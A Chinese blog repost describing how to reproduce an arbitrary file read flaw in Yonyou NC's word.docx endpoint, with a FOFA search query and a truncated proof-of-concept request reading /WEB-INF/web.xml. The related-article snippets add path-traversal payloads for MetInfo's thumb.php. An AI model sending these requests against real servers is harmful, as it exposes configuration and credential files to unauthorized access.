用友NC word.docx 任意文件读取漏洞复现

8月前作者：OidBoy_G 分类：Toy博客阅读(23) 违法举报

这篇具有很好参考价值的文章主要介绍了用友NC word.docx 任意文件读取漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

用友NC 系统word.docx等接口存在任意文件读取漏洞，未经身份认证的攻击者可以通过此漏洞获取敏感信息，使系统处于极不安全状态。

0x03 复现环境

FOFA：

body="UClient.dmg"

0x04 漏洞复现

PoC文章来源地址https://www.toymoban.com/news/detail-824637.html

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Age

到了这里，关于用友NC word.docx 任意文件读取漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。用友GRP-U8行政事业内控

2024年02月11日
浏览(38)
任意文件读取及漏洞复现

一些网站的需求，可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过，就可以查看或下载任意文件。这些文件可以是源代码文件，配置文件，敏感文件等等。任意文件读取会造成（敏感）信息泄露：任意文件读取很多情况是由于其他漏

2024年02月09日
浏览(41)
任意文件读取和漏洞复现

一些网站的需求，可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过，就可以查看或下载任意文件。这些文件可以是漂代码文件，配置文件，敏感文件等等。任意文件读取会造成（敏感）信息泄露：任意文件读取大多数情况是由于其他

2024年02月09日
浏览(33)
【漏洞复现】OfficeWeb365 Indexs 任意文件读取漏洞

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。 FOFA：body=\\\"请输入furl参数\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 读取文件加密方式

2024年02月02日
浏览(36)
Jenkins CLI 任意文件读取漏洞复现

Jenkins CLI 是 Jenkins 内置的命令行页面。 Jenkins 受影响版本中使用 args4j 库解析CLI命令参数，该库默认将参数中 @ 字符后的文件路径替换为文件内容，未授权的攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进

2024年02月22日
浏览(45)
OfficeWeb365 Indexs 任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。 OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特

2024年02月03日
浏览(29)
漏洞复现-Yearning front 任意文件读取漏洞（附漏洞检测脚本）

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担

2024年01月18日
浏览(32)
Metinfo6.0.0任意文件读取【漏洞复现】

1.1、漏洞描述漏洞名称：MetInfo任意文件读取漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。下载地址：历史版本安装文件下载 Ver_6.0.0 1.2、漏洞等

2024年02月10日
浏览(31)
Metinfo6.0.0任意文件读取漏洞复现

漏洞原理在MetInfo6.0.0appsystemincludemodule的old_thumb.class.php文件可以看到这里对./进行了严格的过滤，但是却忽略了在Windows下还可以用…来跳转目录环境搭建下载Metinfo6.0.0 配置随便写，自己记住就行这里前面已经审计过代码了，就直接上payload了 http://10.9.75.161/MetInfo6.0.0

2024年02月10日
浏览(24)
metinfo_6.0.0 任意文件读取漏洞复现

漏洞点为/include/thumb.php 一测： /include/thumb.php?dir=..././http/..././config/config_db.php 二测： /include/thumb.php?dir=.....///http/.....///config/config_db.php 三测： /include/thumb.php?dir=http/.....///.....///config/config_db.php 四测： /include/thumb.php?dir=http....configconfig_db.php 注意：此POC 仅适用于Windows 系统

2024年01月20日
浏览(37)